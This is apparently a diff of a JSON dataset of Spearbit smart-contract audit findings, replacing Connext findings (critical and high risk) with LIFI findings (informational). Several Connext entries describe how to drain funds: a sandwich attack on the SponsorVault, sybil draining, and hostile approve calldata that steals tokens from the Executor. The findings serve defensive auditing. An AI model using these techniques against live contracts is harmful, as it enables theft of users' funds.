//SPDX-License-Identifier: MIT pragma solidity 0.8.14; import \"hardhat/console.sol\"; contract test { uint[] balances = new uint[](10); function swap(uint8 tokenIndexFrom,uint8 tokenIndexTo,uint dx) public { uint dy=dx; // simplified uint256[] memory mbalances = balances; balances[tokenIndexFrom] = mbalances[tokenIndexFrom] + dx; balances[tokenIndexTo] = mbalances[tokenIndexTo] - dy; } constructor() { balances[3] = 100; swap(3,3,10); console.log(balances[3]); // 90 } }", + "title": "Integrate two versions of depositAsset()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The function depositAsset(, , isNative ) doesn't check tokenId == NATIVE_ASSETID, although depositAsset(,) does. In the code base depositAsset(, , isNative ) isn't used. function depositAsset( address tokenId, uint256 amount, bool isNative ) internal { if (amount == 0) revert InvalidAmount(); if (isNative) { ... } else { ... } } function depositAsset(address tokenId, uint256 amount) internal { return depositAsset(tokenId, amount, tokenId == NATIVE_ASSETID); }", "labels": [ "Spearbit", - "Connext", - "Severity: Critical Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Use of spot price in SponsorVault leads to sandwich attack.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "There is a special role sponsor in the protocol. Sponsors can cover the liquidity fee and transfer fee for users, making it more favorable for users to migrate to the new chain. Sponsors can either provide liquidity for each adopted token or provide the native token in the SponsorVault. If the native token is provided, the SponsorVault will swap to the adopted token before transferring it to users. contract SponsorVault is ISponsorVault, ReentrancyGuard, Ownable { ... function reimburseLiquidityFees( address _token, uint256 _liquidityFee, address _receiver ) external override onlyConnext returns (uint256) { ... uint256 amountIn = tokenExchange.getInGivenExpectedOut(_token, _liquidityFee); amountIn = currentBalance >= amountIn ? amountIn : currentBalance; // sponsored fee may end being less than _liquidityFee due to slippage sponsoredFee = tokenExchange.swapExactIn{value: amountIn}(_token, msg.sender); ... } } The spot AMM price is used when doing the swap. Attackers can manipulate the value of getInGivenExpectedOut and make SponsorVault sell the native token at a bad price. By executing a sandwich attack the exploiters can drain all native tokens in the sponsor vault. For the sake of the following example, assume that _token is USDC and native token is ETH, the sponsor tries to sponsor 100 usdc to the users: Attacker first manipulates the DEX and makes the exchange of 1 ETH = 0.1 USDC. getInGivenExpectedOut returns 100 / 0.1 = 1000. tokenExchange.swapExactIn buys 100 USDC with 1000 ETH, causing the ETH price to decrease even lower. Attacker buys ETH at a lower prices and realizes a profit.", + "title": "Simplify batchRemoveDex()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The code of batchRemoveDex() is somewhat difficult to understand and thus to maintain. function batchRemoveDex(address[] calldata _dexs) external { ... uint256 jlength = storageDexes.length; for (uint256 i = 0; i < ilength; i++) { ... for (uint256 j = 0; j < jlength; j++) { if (storageDexes[j] == _dexs[i]) { ...
// update storageDexes.length; jlength = storageDexes.length; break; } } } }", "labels": [ "Spearbit", - "Connext", - "Severity: Critical Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Configuration is crucial (both Nomad and Connext)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The Connext and Nomad protocol rely heavily on configuration parameters. These parameters are configured during deployment time and are updated afterwards. Configuration errors can have major conse- quences. Examples of important configurations are: BridgeFacet.sol: s.promiseRouter. BridgeFacet.sol: s.connextions. BridgeFacet.sol: s.approvedSequencers. Router.sol: remotes[]. xAppConnectionManager.sol: home . xAppConnectionManager.sol: replicaToDomain[]. xAppConnectionManager.sol: domainToReplica[].", + "title": "Error handling in executeCallAndWithdraw", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "If isContract happens to be false, then success is false (as it is initialized as false and not updated); thus the _withdrawAsset() will never happen. Function withdraw() also exists, so this functionality isn't necessary, but it is more logical to revert earlier. function executeCallAndWithdraw(...) ... { ... bool success; bool isContract = LibAsset.isContract(_callTo); if (isContract) { (success, ) = _callTo.call(_callData); } // success stays false if isContract == false if (success) { _withdrawAsset(_assetAddress, _to, _amount); // this never happens if isContract == false } else { revert WithdrawFailed(); } }
}", "labels": [ "Spearbit", - "Connext", - "Severity: High Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Routers can sybil attack the sponsor vault to drain funds", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "When funds are bridged from source to destination chain messages must first go through optimistic verification before being executed on the destination BridgeFacet.sol contract. Upon transfer processing the contract checks if the domain is sponsored. If such is the case then the user is reimbursed for both liquidity fees paid when the transfer was initiated and for the fees paid to the relayer during message propagation. There currently isnt any mechanism to detect sybil attacks. Therefore, a router can perform several large value transfers in an effort to drain the sponsor vault of its funds. Because liquidity fees are paid to the router by a user connected to the router, there isnt any value lost in this type of attack.", + "title": "anySwapOut() doesnt lower allowance", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The function anySwapOut() only seems to work with Anyswap tokens. It burns the received to- kens here: AnyswapV5Router.sol#L334 This burning doesnt use/lower the allowance, so the allowance will stay present. Also see howto: function anySwapOut ==> no need to approve. function _startBridge(...) ... { ... LibAsset.maxApproveERC20(IERC20(underlyingToken), _anyswapData.router, _anyswapData.amount); ... IAnyswapRouter(_anyswapData.router).anySwapOut(...); }", "labels": [ "Spearbit", - "Connext", - "Severity: High Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Routers are exposed to extreme slippage if they attempt to repay debt before being reconciled", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "When routers are reconciled, the local asset may need to be exchanged for the adopted asset in order to repay the unbacked Aave loan. AssetLogic.swapFromLocalAssetIfNeededForExactOut() takes two key arguments: _amount representing exactly how much of the adopted asset should be received. _maxIn which is used to limit slippage and limit how much of the local asset is used in the swap. Upon failure to swap, the protocol will reset the values for unbacked Aave debt and distribute local tokens to the router. However, if this router partially paid off some of the unbacked Aave debt before being reconciled, _maxIn will diverge from _amount, allowing value to be extracted in the form of slippage. As a result, routers may receive less than the amount of liquidity they initially provided, leading to router insolvency.", + "title": "Anyswap rebrand", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Anyswap is rebranded to Multichain see rebrand.", "labels": [ "Spearbit", - "Connext", - "Severity: High Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Malicious call data can DOS execute", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "An attacker can DOS the executor contract by giving infinite allowance to normal users. Since the executor increases allowance before triggering an external call, the tx will always revert if the allowance is already infinite. 
11 function execute(ExecutorArgs memory _args) external payable override onlyConnext returns (bool, bytes ,! memory) { ... if (!isNative && hasValue) { SafeERC20.safeIncreaseAllowance(IERC20(_args.assetId), _args.to, _args.amount); // reverts if set to `infinite` before } ... (success, returnData) = ExcessivelySafeCall.excessivelySafeCall(...) // can set to `infinite` allowance ... ,! ,! }", + "title": "Check processing of native tokens in AnyswapFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The variable isNative seems to mean a wrapped native token is used (see function _getUnderlyingToken()). Currently startBridgeTokensViaAnyswap() skips LibAsset.depositAsset() when isNative == true, but wrapped native tokens should also be moved via LibAsset.depositAsset(). Also, _startBridge() tries to send native tokens with { value: _anyswapData.amount } when isNative == true, but this wouldn't work with wrapped tokens. The Howto seems to indicate an approval (of the wrapped native token) is necessary. contract AnyswapFacet is ILiFi, SwapperV2, ReentrancyGuard { function startBridgeTokensViaAnyswap(LiFiData calldata _lifiData, AnyswapData calldata _anyswapData) ... { // Multichain (formerly Anyswap) tokens can wrap other tokens (address underlyingToken, bool isNative) = _getUnderlyingToken(_anyswapData.token, _anyswapData.router); if (!isNative) LibAsset.depositAsset(underlyingToken, _anyswapData.amount); ... } function _getUnderlyingToken(address token, address router) ... { ... if (token == address(0)) revert TokenAddressIsZero(); underlyingToken = IAnyswapToken(token).underlying(); // The native token does not use the standard null address ID isNative = IAnyswapRouter(router).wNATIVE() == underlyingToken; // Some Multichain complying tokens may wrap nothing if (!isNative && underlyingToken == address(0)) { underlyingToken = token; } } function _startBridge(... ) ... { ... if (isNative) { IAnyswapRouter(_anyswapData.router).anySwapOutNative{ value: _anyswapData.amount }(...); // send native tokens } ... } }", "labels": [ "Spearbit", - "Connext", - "Severity: High Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "DOS attack on the Nomad Home.sol Contract", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "Upon calling xcall(), a message is dispatched via Nomad. A hash of this message is inserted into the merkle tree and the new root will be added at the end of the queue. Whenever the updater of Home.sol commits to a new root, improperUpdate() will check that the new update is not fraudulent. In doing so, it must iterate through the queue of merkle roots to find the correct committed root. Because anyone can dispatch a message and insert a new root into the queue it is possible to impact the availability of the protocol by preventing honest messages from being included in the updated root. function improperUpdate(..., bytes32 _newRoot, ... ) public notFailed returns (bool) { ... // if the _newRoot is not currently contained in the queue, // slash the Updater and set the contract to FAILED state if (!queue.contains(_newRoot)) { _fail(); ... } ...
} function contains(Queue storage _q, bytes32 _item) internal view returns (bool) { for (uint256 i = _q.first; i <= _q.last; i++) { if (_q.queue[i] == _item) { return true; } } return false; }", + "title": "Remove payable in swapAndCompleteBridgeTokensViaStargate()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "There are 2 versions of sgReceive() / completeBridgeTokensViaStargate() which use different locations for nonReentrant. The function swapAndCompleteBridgeTokensViaStargate of Executor is payable but doesn't receive native tokens. contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function sgReceive(...) external { // not payable ... this.swapAndCompleteBridgeTokensViaStargate(lifiData, swapData, assetId, payable(receiver)); // doesn't send native assets ... } function swapAndCompleteBridgeTokensViaStargate(...) external payable nonReentrant { // is payable if (msg.sender != address(this)) { revert InvalidCaller(); } } }", "labels": [ "Spearbit", - "Connext", - "Severity: High Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Upon failing to back unbacked debt _reconcileProcessPortal() will leave the converted asset in the contract", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "When routers front liquidity for the protocols users they are later reconciled once the bridge has optimistically verified transfers from the source chain. Upon being reconciled, the _reconcileProcessPortal() attempts to first pay back Aave debt before distributing the rest back to the router. However, _reconcileProcess- Portal() will not convert the adopted asset back to the local asset in the case where the call to the Aave pool fails. Instead, the function will set amountIn = 0 and continue to distribute the local asset to the router. if (success) { emit AavePortalRepayment(_transferId, adopted, backUnbackedAmount, portalFee); } else { // Reset values s.portalDebt[_transferId] += backUnbackedAmount; s.portalFeeDebt[_transferId] += portalFee; // Decrease the allowance SafeERC20.safeDecreaseAllowance(IERC20(adopted), s.aavePool, totalRepayAmount); // Update the amount repaid to 0, so the amount is credited to the router amountIn = 0; emit AavePortalRepaymentDebt(_transferId, adopted, s.portalDebt[_transferId], s.portalFeeDebt[_transferId]); ,! }", + "title": "Use the same order for inherited contracts.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Contract inheritance isn't always declared in the same order. For code consistency it's best to always put the inherited contracts in the same order.
contract AmarokFacet is ILiFi, SwapperV2, ReentrancyGuard { contract AnyswapFacet is ILiFi, SwapperV2, ReentrancyGuard { contract ArbitrumBridgeFacet is ILiFi, SwapperV2, ReentrancyGuard { contract CBridgeFacet is ILiFi, SwapperV2, ReentrancyGuard { contract GenericSwapFacet is ILiFi, SwapperV2, ReentrancyGuard { contract GnosisBridgeFacet is ILiFi, SwapperV2, ReentrancyGuard { contract HopFacet is ILiFi, SwapperV2, ReentrancyGuard { contract HyphenFacet is ILiFi, SwapperV2, ReentrancyGuard { contract NXTPFacet is ILiFi, SwapperV2, ReentrancyGuard { contract OmniBridgeFacet is ILiFi, SwapperV2, ReentrancyGuard { contract OptimismBridgeFacet is ILiFi, SwapperV2, ReentrancyGuard { contract PolygonBridgeFacet is ILiFi, SwapperV2, ReentrancyGuard { contract StargateFacet is ILiFi, SwapperV2, ReentrancyGuard { contract GenericBridgeFacet is ILiFi, ReentrancyGuard { contract WormholeFacet is ILiFi, ReentrancyGuard, Swapper { contract AcrossFacet is ILiFi, ReentrancyGuard, SwapperV2 { contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi {", "labels": [ "Spearbit", - "Connext", - "Severity: High Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "_handleExecuteTransaction() doesnt handle native assets correctly", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function _handleExecuteTransaction() sends any native tokens to the executor contract first, and then calls s.executor.execute(). This means that within that function msg.value will always be 0. So the associated logic that uses msg.value doesnt work as expected and the function doesnt handle native assets correctly. Note: also see issue \"Executor reverts on receiving native tokens from BridgeFacet\" contract BridgeFacet is BaseConnextFacet { function _handleExecuteTransaction(...)... { ... AssetLogic.transferAssetFromContract(_asset, address(s.executor), _amount); (bool success, bytes memory returnData) = s.executor.execute(...); // no native tokens send } } contract Executor is IExecutor { function execute(ExecutorArgs memory _args) external payable override onlyConnext returns (bool, bytes memory) { ,! ... if (isNative && msg.value != _args.amount) { // msg.value is always 0 ... } } }", + "title": "Catch potential revert in swapAndStartBridgeTokensViaStargate()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The following statement nativeFee -= _swapData[i].fromAmount; can revert in swapAndStartBridgeTokensViaStargate(). function swapAndStartBridgeTokensViaStargate(...) ... { ... for (uint8 i = 0; i < _swapData.length; i++) { if (LibAsset.isNativeAsset(_swapData[i].sendingAssetId)) { nativeFee -= _swapData[i].fromAmount; // can revert } } ... }", "labels": [ "Spearbit", - "Connext", - "Severity: High Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Add checks to xcall()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function xcall() does some sanity checks, nevertheless more checks should be added to prevent issues later on in the use of the protocol. If _args.recovery== 0 then _sendToRecovery() will send funds to the 0 address, effectively losing them. If _params.agent == 0 the forceReceiveLocal cant be used and funds might be locked forever.
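For "Catch potential revert in swapAndStartBridgeTokensViaStargate()" above, a sketch of an explicit guard that fails with a descriptive error instead of a bare arithmetic underflow; the error name is ours.
pragma solidity ^0.8.13;
contract NativeFeeSketch {
    error NativeFeeExceeded(uint256 requested, uint256 available); // hypothetical error name
    function consumeNativeFee(uint256 nativeFee, uint256 fromAmount) internal pure returns (uint256) {
        // check first, so the caller gets a meaningful revert reason
        if (fromAmount > nativeFee) revert NativeFeeExceeded(fromAmount, nativeFee);
        return nativeFee - fromAmount;
    }
}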
The _args.params.destinationDomain should never be s.domain, although this is also implicitly checked via _mustHaveRemote() assuming a correct configuration. If _args.params.slippageTol is set to something greater than s.LIQUIDITY_FEE_DENOMINATOR then funds can be locked as xcall() allows for the user to provide the local asset, avoiding any swap while _handleExecuteLiquid- ity() in execute() may attempt to perform a swap on the destination chain. function xcall(XCallArgs calldata _args) external payable nonReentrant whenNotPaused returns (bytes32) { // Sanity checks. ... } 14", + "title": "No need to use library if it is in the same file", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "In LibAsset, some of the functions are called through LibAsset., however there is no need to do so because the functions are in the same Solidity file. ... ... if (msg.value != 0) revert NativeValueWithERC(); uint256 _fromTokenBalance = LibAsset.getOwnBalance(tokenId); LibAsset.transferFromERC20(tokenId, msg.sender, address(this), amount); if (LibAsset.getOwnBalance(tokenId) - _fromTokenBalance != amount) revert InvalidAmount();", "labels": [ "Spearbit", - "Connext", - "Severity: High Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Executor and AssetLogic deals with the native tokens inconsistently that breaks execute()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "When dealing with an external callee the BridgeFacet will transfer liquidity to the Executor before calling Executor.execute. In order to send the native token: The Executor checks for _args.assetId == address(0). AssetLogic.transferAssetFromContract() disallows address(0). Note: also see issue Executor reverts on receiving native tokens from BridgeFacet. 15 contract BridgeFacet is BaseConnextFacet { function _handleExecuteTransaction() ...{ ... AssetLogic.transferAssetFromContract(_asset, address(s.executor), _amount); // _asset may not ,! be 0 (bool success, bytes memory returnData) = s.executor.execute( IExecutor.ExecutorArgs( // assetId parameter from ExecutorArgs // must be 0 for Native asset ... _asset, ... ) ); ... } } library AssetLogic { function transferAssetFromContract( address _assetId, ... ) { ... // No native assets should ever be stored on this contract if (_assetId == address(0)) revert AssetLogic__transferAssetFromContract_notNative(); if (_assetId == address(s.wrapper)) { // If dealing with wrapped assets, make sure they are properly unwrapped // before sending from contract s.wrapper.withdraw(_amount); Address.sendValue(payable(_to), _amount); } } } contract Executor is IExecutor { function execute(ExecutorArgs memory _args) external payable override onlyConnext returns (bool, bytes memory) { ,! ... bool isNative = _args.assetId == address(0); ... } } The BridgeFacet cannot handle external callees when using native tokens.", + "title": "Combined Optimism and Synthetix bridge", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The Optimism bridge also includes a specific bridge for Synthetix tokens. Perhaps it is more clear to have a separate Facet for this. function _startBridge(...) ... { ... if (_bridgeData.isSynthetix) { bridge.depositTo(_bridgeData.receiver, _amount); } else { ...
} }", "labels": [ "Spearbit", - "Connext", - "Severity: High Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Executor reverts on receiving native tokens from BridgeFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "When doing an external call in execute(), the BridgeFacet provides liquidity into the Executor contract before calling Executor.execute. The BridgeFacet transfers native token when address(wrapper) is provided. The Executor however does not have a fallback/ receive function. Hence, the transaction will revert when the BridgeFacet tries to send the native token to the Executor contract. function _handleExecuteTransaction( ... AssetLogic.transferAssetFromContract(_asset, address(s.executor), _amount); (bool success, bytes memory returnData) = s.executor.execute(...); ... } function transferAssetFromContract(...) ... { ... if (_assetId == address(s.wrapper)) { // If dealing with wrapped assets, make sure they are properly unwrapped // before sending from contract s.wrapper.withdraw(_amount); Address.sendValue(payable(_to), _amount); } else { ... } }", + "title": "Doublecheck the Diamond pattern", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The LiFi protocol uses the diamond pattern. This pattern is relative complex and has overhead for the delegatecall. There is not much synergy between the different bridges (except for access controls & white lists). By combining all the bridges in one contract, the risk of one bridge might have an influence on another bridge.", "labels": [ "Spearbit", - "Connext", - "Severity: High Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "SponsorVault sponsors full transfer amount in reimburseLiquidityFees()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The BridgeFacet passes args.amount as _liquidityFee when calling reimburseLiquidityFees. Instead of sponsoring liquidityFee, the sponsor vault would sponsor full transfer amount to the reciever. Note: Luckily the amount in reimburseLiquidityFees is capped by relayerFeeCap. function _handleExecuteTransaction(...) ... { ... (bool success, bytes memory data) = address(s.sponsorVault).call( abi.encodeWithSelector(s.sponsorVault.reimburseLiquidityFees.selector, _asset, _args.amount, _args.params.to) ); ,! } 17", + "title": "Reference Diamond standard", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The LiFiDiamond.sol contract doesnt contain a reference to the Diamond contract. Having that would make it easier for readers of the code to find the origin of the contract.", "labels": [ "Spearbit", - "Connext", - "Severity: High Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Tokens can get stuck in Executor contract if the destination doesnt claim them all", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function execute() increases allowance and then calls the recipient (_args.to). When the recipient does not use all tokens, these could remain stuck inside the Executor contract. Note: the executor can have excess tokens, see: kovan executor. Note: see issue \"Malicious call data can DOS execute or steal unclaimed tokens in the Executor contract\". function execute(...) ... { ... 
if (!isNative && hasValue) { SafeERC20.safeIncreaseAllowance(IERC20(_args.assetId), _args.to, _args.amount); } ... (success, returnData) = ExcessivelySafeCall.excessivelySafeCall( _args.to, ... ); ... }", + "title": "Validate Nxtp InvariantTransactionData", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "During the code review, it has been noticed that InvariantTransactionData's fields are not validated. Even if the validation is located in the router, the sendingChainFallback and receivingAddress parameters are sensitive, and Connext does not provide meaningful error messages when validating these parameters. Also, the router parameter does not have any validation, while most of the other facets have one; for instance, see AmarokFacet. Note: also see issue \"Hardcode bridge addresses via immutable\" function _startBridge(NXTPData memory _nxtpData) private returns (bytes32) { ITransactionManager txManager = ITransactionManager(_nxtpData.nxtpTxManager); IERC20 sendingAssetId = IERC20(_nxtpData.invariantData.sendingAssetId); // Give Connext approval to bridge tokens LibAsset.maxApproveERC20(IERC20(sendingAssetId), _nxtpData.nxtpTxManager, _nxtpData.amount); uint256 value = LibAsset.isNativeAsset(address(sendingAssetId)) ? _nxtpData.amount : 0; // Initiate bridge transaction on sending chain ITransactionManager.TransactionData memory result = txManager.prepare{ value: value }( ITransactionManager.PrepareArgs( _nxtpData.invariantData, _nxtpData.amount, _nxtpData.expiry, _nxtpData.encryptedCallData, _nxtpData.encodedBid, _nxtpData.bidSignature, _nxtpData.encodedMeta ) ); return result.transactionId; }", "labels": [ "Spearbit", - "Connext", - "Severity: High Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "reimburseLiquidityFees send tokens twice", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function reimburseLiquidityFees() is called from the BridgeFacet, making the msg.sender within this function to be BridgeFacet. When using tokenExchanges via swapExactIn() tokens are sent to msg.sender, which is the BridgeFacet. Then, tokens are sent again to msg.sender via safeTransfer(), which is also the BridgeFacet. Therefore, tokens end up being sent to the BridgeFacet twice. Note: the check ...balanceOf(...) != starting + sponsored should fail too. Note: The fix in C4 seems to introduce this issue: code4rena-246 18 contract BridgeFacet is BaseConnextFacet { function _handleExecuteTransaction(... ) ... { ... uint256 starting = IERC20(_asset).balanceOf(address(this)); ... (bool success, bytes memory data) = address(s.sponsorVault).call( abi.encodeWithSelector(s.sponsorVault.reimburseLiquidityFees.selector, _asset, _args.amount, ,! _args.params.to) ); if (success) { uint256 sponsored = abi.decode(data, (uint256)); // Validate correct amounts are transferred if (IERC20(_asset).balanceOf(address(this)) != starting + sponsored) { // this should revert BridgeFacet__handleExecuteTransaction_invalidSponsoredAmount(); ,! fail now } ... } ... } } contract SponsorVault is ISponsorVault, ReentrancyGuard, Ownable { function reimburseLiquidityFees(... ) { if (address(tokenExchanges[_token]) != address(0)) { ... sponsoredFee = tokenExchange.swapExactIn{value: amountIn}(_token, msg.sender); // send to ,! msg.sender } else { ... } ...
IERC20(_token).safeTransfer(msg.sender, sponsoredFee); // send again to msg.sender } } interface ITokenExchange { /** * @notice Swaps the exact amount of native token being sent for a given token. * @param token The token to receive * @param recipient The recipient of the token * @return The amount of tokens resulting from the swap */ function swapExactIn(address token, address recipient) external payable returns (uint256); }", + "title": "Executor contract should not handle cross-chain swap from Connext", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The Executor contract is designed to handle a swap at the destination chain. The LIFI protocol may build a cross-chain transaction to call Executor.swapAndCompleteBridgeTokens at the destination chain. In order to do a flexible swap, the Executor can perform arbitrary execution. Executor.sol#L323-L333 function _executeSwaps( LiFiData memory _lifiData, LibSwap.SwapData[] calldata _swapData, address payable _receiver ) private noLeftovers(_swapData, _receiver) { for (uint256 i = 0; i < _swapData.length; i++) { if (_swapData[i].callTo == address(erc20Proxy)) revert UnAuthorized(); // Prevent calling ERC20 Proxy directly LibSwap.SwapData calldata currentSwapData = _swapData[i]; LibSwap.swap(_lifiData.transactionId, currentSwapData); } } However, the receiver address is a privileged address in some bridging services. Allowing users to do arbitrary execution / external calls is dangerous. The Connext protocol is an example: Connext contractAPI#cancel. The receiver address can prematurely cancel a cross-chain transaction. When a cross-chain execution is canceled, the funds would be sent to the fallback address without executing the external call. Exploiters can front-run a Gelato relayer and cancel a cross-chain execution. The (post-swap) tokens will be sent to the receiver's address. The exploiters can grab the tokens left in the Executor in the same transaction.", "labels": [ "Spearbit", - "Connext", - "Severity: High Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Anyone can repay the portalDebt with different tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "Routers can provide liquidity in the protocol to improve the UX of cross-chain transfers. Liquidity is sent to users under the routers consent before the cross-chain message is settled on the optimistic message protocol, i.e., Nomad. The router can also borrow liquidity from AAVE if the router does not have enough of it. It is the routers responsibility to repay the debt to AAVE. contract PortalFacet is BaseConnextFacet { function repayAavePortalFor( address _adopted, uint256 _backingAmount, uint256 _feeAmount, bytes32 _transferId ) external payable { address adopted = _adopted == address(0) ? address(s.wrapper) : _adopted; ... // Transfer funds to the contract uint256 total = _backingAmount + _feeAmount; if (total == 0) revert PortalFacet__repayAavePortalFor_zeroAmount(); (, uint256 amount) = AssetLogic.handleIncomingAsset(_adopted, total, 0); ... // repay the loan _backLoan(adopted, _backingAmount, _feeAmount, _transferId); } } The PortalFacet does not check whether _adopted is the correct token in debt. Assume that the protocol borrows ETH for the current _transferId, therefore Router should repay ETH to clear the debt. However, the Router can provide any valid tokens, e.g. DAI, USDC, to clear the debt.
This results in the insolvency of the protocol. Note: a similar issue is also present in repayAavePortal().", + "title": "Avoid using strings in the interface of the Axelar Facet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The Axelar Facet uses strings to indicate the destinationChain, destinationAddress, which is different than on other bridge facets. function executeCallWithTokenViaAxelar( string memory destinationChain, string memory destinationAddress, string memory symbol, ... ) ...{ } The contract address is (or at least can be) encoded as a hex string, as seen in this example: https://etherscan.io/tx/0x7477d550f0948b0933cf443e9c972005f142dfc5ef720c3a3324cefdc40ecfa2 The decoded parameters are: 0 destinationChain (string) = binance; 1 destinationContractAddress (string) = 0xA57ADCE1d2fE72949E4308867D894CD7E7DE0ef2; 2 payload (bytes); 3 symbol (string) = USDC; 4 amount (uint256) = 50000000. The Axelar bridge allows bridging to non-EVM chains; however, the LiFi protocol doesn't seem to support this. So it's good to prevent accidentally sending to non-EVM chains. Here are the supported non-EVM chains: non-evm-networks. The Axelar interface doesn't have a (compatible) emit.", "labels": [ "Spearbit", - "Connext", - "Severity: High Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Malicious call data can steal unclaimed tokens in the Executor contract", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "Users can provide a destination contract args.to and arbitrary data _args.callData when doing a cross-chain transfer. The protocol will provide the allowance to the callee contract and triggers the function call through ExcessivelySafeCall.excessivelySafeCall. 20 contract Executor is IExecutor { function execute(ExecutorArgs memory _args) external payable override onlyConnext returns (bool, bytes memory) { ,! ... SafeERC20.safeIncreaseAllowance(IERC20(_args.assetId), _args.to, _args.amount); ... // Try to execute the callData // the low level call will return `false` if its execution reverts (success, returnData) = ExcessivelySafeCall.excessivelySafeCall( _args.to, gas, isNative ? _args.amount : 0, MAX_COPY, _args.callData ); ... } } Since there arent restrictions on the destination contract and calldata, exploiters can steal the tokens from the executor. Note: the executor does have excess tokens, see: see: kovan executor. Note: see issue Tokens can get stuck in Executor contract. Tokens can be stolen by granting an allowance. Setting calldata = abi.encodeWithSelector(ERC20.approve.selector, exploiter, type(uint256).max); and args.to = tokenAddress allows the exploiter to get an infinite allowance of any token, effectively stealing any unclaimed tokens left in the executor.", + "title": "Hardcode source Nomad domain ID via immutable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "AmarokFacet takes the source domain ID as a user parameter and passes it to the bridge: originDomain: _bridgeData.srcChainDomain. The user-provided value can be incorrect, and Connext will later revert the transaction.
